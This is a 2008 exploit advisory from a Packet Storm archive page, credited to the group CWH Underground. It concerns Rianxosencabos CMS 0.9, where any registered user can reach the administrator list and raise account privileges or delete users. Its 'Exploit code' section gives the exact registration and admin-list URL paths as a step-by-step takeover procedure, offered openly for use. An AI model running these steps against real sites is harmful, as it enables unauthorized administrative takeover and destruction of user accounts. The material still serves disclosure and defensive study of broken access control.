what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

rianxosencabos-admin.txt

rianxosencabos-admin.txt
Posted Sep 22, 2008
Authored by CWH Underground | Site citecclub.org

Rianxosencabos CMS version 0.9 suffers from an add arbitrary administrator vulnerability.

tags | exploit, arbitrary, add administrator
SHA-256 | 10a65c882a571fa7fd3568787de2a54e8d79055a91ea1a6ba325ade98fcb3844

rianxosencabos-admin.txt

Change Mirror Download
============================================================
Rianxosencabos CMS 0.9 Arbitrary Add-Admin Vulnerability
============================================================

,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..
`+---------------------------^----------|
`\_,-------, _________________________|
/ XXXXXX /`| /
/ XXXXXX / `\ /
/ XXXXXX /\______(
/ XXXXXX /
/ XXXXXX /
(________(
`------'

AUTHOR : CWH Underground
DATE : 21 September 2008
SITE : cwh.citec.us


###################################################################################
APPLICATION : Rianxosencabos CMS
VERSION : 0.9
DOWNLOAD : http://downloads.sourceforge.net/rsccms/rsccms.tar.gz
###################################################################################


--- Add-Admin / Delete-Account Vulnerability ---


-------------
Description
-------------

Rianxosencabos CMS 0.9 has Vulnerability to escalate user to administartor's privilege.
That Vulnerable in "http://[Target]/[rsccms_path]/?s=admin&accion=lista" and You can Arbitrary change user's permission or delete user

This action will give your account can use All Admin Control Panel with Administrative's Privilege or Arbitrary Delete account in website.


--------------
Exploit code
--------------
[+] Log in with your account, You can register with this URL "http://[Target]/[rsccms_path]/?s=usuarios&accion=registrar"
[+] Go to "http://[Target]/[rsccms_path]/?s=admin&accion=lista"
[+] Now you can Change user permission or delete user account


#####################################################################
Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos
Special Thx : asylu3, str0ke, citec.us, milw0rm.com
#####################################################################

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close